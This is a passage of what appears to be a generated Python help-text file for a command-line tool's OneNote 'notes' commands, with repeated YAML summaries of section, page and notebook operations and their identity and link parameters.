"Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't 